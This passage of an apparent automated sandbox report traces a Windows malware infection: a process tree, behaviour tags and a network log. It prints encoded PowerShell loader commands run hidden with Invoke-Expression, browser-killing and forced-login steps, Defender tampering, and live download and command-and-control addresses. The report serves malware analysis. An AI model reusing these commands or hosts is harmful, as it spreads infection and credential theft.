dW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3020
            • C:\Users\Admin\AppData\Local\Temp\10369560101\d744367ecb.exe
              "C:\Users\Admin\AppData\Local\Temp\10369560101\d744367ecb.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1864
            • C:\Users\Admin\AppData\Local\Temp\10369570101\5cf0a9b56c.exe
              "C:\Users\Admin\AppData\Local\Temp\10369570101\5cf0a9b56c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2860
            • C:\Users\Admin\AppData\Local\Temp\10369580101\57dbff855a.exe
              "C:\Users\Admin\AppData\Local\Temp\10369580101\57dbff855a.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1264
            • C:\Users\Admin\AppData\Local\Temp\10369590101\ef157868ff.exe
              "C:\Users\Admin\AppData\Local\Temp\10369590101\ef157868ff.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:3020
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2312
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1256
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:992
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2888
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:796
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:2976
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2912
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.0.50006005\613401117" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 21005 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7c5473a-11fa-42f6-a526-8ab8946729e2} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 1280 11fd9458 gpu
                      9⤵
                        PID:1564
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.1.1353773033\515011638" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21866 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5aa1d30-bf06-4205-ad37-223ae0e96987} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 1496 e71558 socket
                        9⤵
                          PID:2892
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.2.2007791471\1585056513" -childID 1 -isForBrowser -prefsHandle 2044 -prefMapHandle 2040 -prefsLen 21904 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e04190d-013d-4e2d-ac55-b27c4f2a43ff} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 2060 1a6adb58 tab
                          9⤵
                            PID:656
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.3.951158596\1648009126" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26374 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {492a8f0d-1550-4653-a7c6-df4cd05f77e3} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 2912 1b763558 tab
                            9⤵
                              PID:1992
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.4.372753522\613376106" -childID 3 -isForBrowser -prefsHandle 3744 -prefMapHandle 3740 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ad01e5-1743-4671-a2ae-e6c8141fa088} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 3752 1ed1c458 tab
                              9⤵
                                PID:1256
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.5.1687653682\414995475" -childID 4 -isForBrowser -prefsHandle 3864 -prefMapHandle 3868 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e5d2501-2efe-41bc-902e-3d3ceabc9406} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 3852 1ed1eb58 tab
                                9⤵
                                  PID:2040
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.6.214322817\1208165664" -childID 5 -isForBrowser -prefsHandle 4076 -prefMapHandle 4084 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a720ba0-645b-4a7e-87d5-0e67ae621786} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 4064 1ed1dc58 tab
                                  9⤵
                                    PID:880
                            • C:\Users\Admin\AppData\Local\Temp\10369600101\b62397d435.exe
                              "C:\Users\Admin\AppData\Local\Temp\10369600101\b62397d435.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3520
                            • C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe
                              "C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3720
                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                "C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3868
                            • C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe
                              "C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4004
                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                "C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3236
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:3372
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                                7⤵
                                • System Location Discovery: System Language Discovery
                                PID:3380
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3428
                            • C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe
                              "C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3768
                            • C:\Users\Admin\AppData\Local\Temp\10369650101\565605dfbd.exe
                              "C:\Users\Admin\AppData\Local\Temp\10369650101\565605dfbd.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3876
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 3876 -s 64
                                7⤵
                                • Loads dropped DLL
                                PID:3972

                  Network

                  • flag-ru
                    GET
                    http://176.113.115.7/mine/random.exe
                    powershell.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /mine/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:58:36 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
                    ETag: "1c6400-6317b04fd38f9"
                    Accept-Ranges: bytes
                    Content-Length: 1860608
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 156
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
